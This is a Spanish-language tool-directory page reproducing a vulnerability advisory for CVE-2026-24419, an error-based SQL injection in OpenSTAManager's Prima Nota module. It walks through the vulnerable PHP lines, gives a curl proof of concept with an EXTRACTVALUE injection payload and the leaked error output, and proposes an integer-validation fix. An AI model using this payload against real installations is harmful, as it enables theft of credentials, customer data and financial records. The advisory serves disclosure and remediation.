Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/lukasz-rybak/cve-2026-24419
Análisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de PenetraciónPapers e InvestigaciónAprendizaje y Educación
GitHublukasz-rybak/cve-2026-24419

CVE-2026-24419

CVE-2026-24419 - OpenSTAManager tiene una inyección SQL en el módulo Prima Nota

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-24419: OpenSTAManager tiene una inyección SQL en el módulo Prima Nota

Resumen

CampoDetalles
ID CVECVE-2026-24419
GravedadALTA
AvisoVer aviso
Descubierto porLukasz Rybak

Productos afectados

  • devcode-it/openstamanager (versiones: <= 2.9.8)

Clasificación CWE

  • CWE-89: Neutralización inadecuada de elementos especiales utilizados en un comando SQL ('Inyección SQL')

Detalles

Resumen

Vulnerabilidad crítica de inyección SQL basada en errores en el módulo Prima Nota (Diario) de OpenSTAManager v2.9.8 que permite a atacantes autenticados extraer el contenido completo de la base de datos, incluidas credenciales de usuario, PII de clientes y registros financieros, a través de mensajes de error XML mediante la inyección de SQL malicioso en los parámetros de la URL.

Estado: ✅ Confirmado y probado en una instancia en vivo (v2.9.8) Parámetros vulnerables: id_documenti (parámetros GET) Endpoint afectado: /modules/primanota/add.php Tipo de ataque: Inyección SQL basada en errores (cláusula IN)

Detalles

OpenSTAManager v2.9.8 contiene una vulnerabilidad crítica de inyección SQL basada en errores en el archivo add.php del módulo Prima Nota (Diario). La aplicación no valida que los valores separados por comas de los parámetros GET sean enteros antes de usarlos en cláusulas SQL IN(), lo que permite a los atacantes inyectar comandos SQL arbitrarios y extraer datos confidenciales a través de mensajes de error XPATH.

Cadena de vulnerabilidad:

  1. Punto de entrada: /modules/primanota/add.php (Líneas 63-67)

    root@kitploit:~
    $id_documenti = $id_documenti ?: get('id_documenti');
    $id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];
    

    Impacto: La función get() recupera parámetros de URL controlados por el usuario, explode(',', (string) ...) los divide por comas, pero NO hay validación que garantice que los elementos sean enteros.

  2. Punto de inyección SQL: /modules/primanota/add.php (Línea 306)

    root@kitploit:~
    $id_anagrafica = $dbo->fetchOne('SELECT idanagrafica FROM co_documenti WHERE id IN('.($id_documenti ? implode(',', $id_documenti) : 0).')')['idanagrafica'];
    

    Impacto: Los elementos de la matriz $id_documenti se concatenan directamente con implode() sin validación de tipo ni prepare(), lo que permite la inyección SQL completa.

Análisis de causa raíz:

La vulnerabilidad existe porque:

  1. get('id_documenti') devuelve cadenas controladas por el usuario
  2. explode(',', (string) $value) divide por comas pero no valida tipos
  3. implode(',', $array) concatena los elementos de la matriz directamente en SQL
  4. No hay validación que garantice que los elementos de la matriz sean enteros
  5. El atacante puede inyectar SQL proporcionando: ?id_documenti=1) AND EXTRACTVALUE(...) %23

Ruta de código afectada:

root@kitploit:~
GET /modules/primanota/add.php?id_documenti=MALICIOUS_PAYLOAD
  ↓
add.php:63 - $id_documenti = get('id_documenti')
  ↓
add.php:64 - $id_documenti = explode(',', (string) $id_documenti) [NO TYPE VALIDATION]
  ↓
add.php:306 - WHERE id IN('.implode(',', $id_documenti).') [INJECTION POINT]

PoC

Paso 1: Iniciar sesión

root@kitploit:~
curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Paso 2: Verificar la vulnerabilidad (inyección SQL basada en errores)

Prueba 1: Extraer usuario y versión de la base de datos

root@kitploit:~
curl -b /tmp/cookies.txt "http://localhost:8081/modules/primanota/add.php?id_documenti=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(USER(),'%20|%20',VERSION()))))%23"

Respuesta (mensaje de error visible para el atacante):

root@kitploit:~
<code>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: &#039;[email protected] | 8.3.0&#039;</code>
image

Impacto

Todos los usuarios autenticados con acceso al módulo Prima Nota (Diario).

Corrección recomendada

Corrección principal: validación de tipos

Archivo: /modules/primanota/add.php

ANTES (Vulnerable - Líneas 63-67):

root@kitploit:~
$id_documenti = $id_documenti ?: get('id_documenti');
$id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];

DESPUÉS (Corregido):

root@kitploit:~
$id_documenti = $id_documenti ?: get('id_documenti');
$id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];
// Validate that all array elements are integers
$id_documenti = array_map('intval', $id_documenti);
$id_documenti = array_filter($id_documenti, fn($id) => $id > 0); // Remove zero/negative IDs

Créditos

Descubierto por Łukasz Rybak

Referencias

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4j2x-jh4m-fqv6
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24419
  • https://github.com/advisories/GHSA-4j2x-jh4m-fqv6

Aviso legal

Esta CVE fue divulgada de manera responsable siguiendo prácticas de divulgación coordinada de vulnerabilidades. La información proporcionada aquí es solo con fines educativos y defensivos.

Descargar herramienta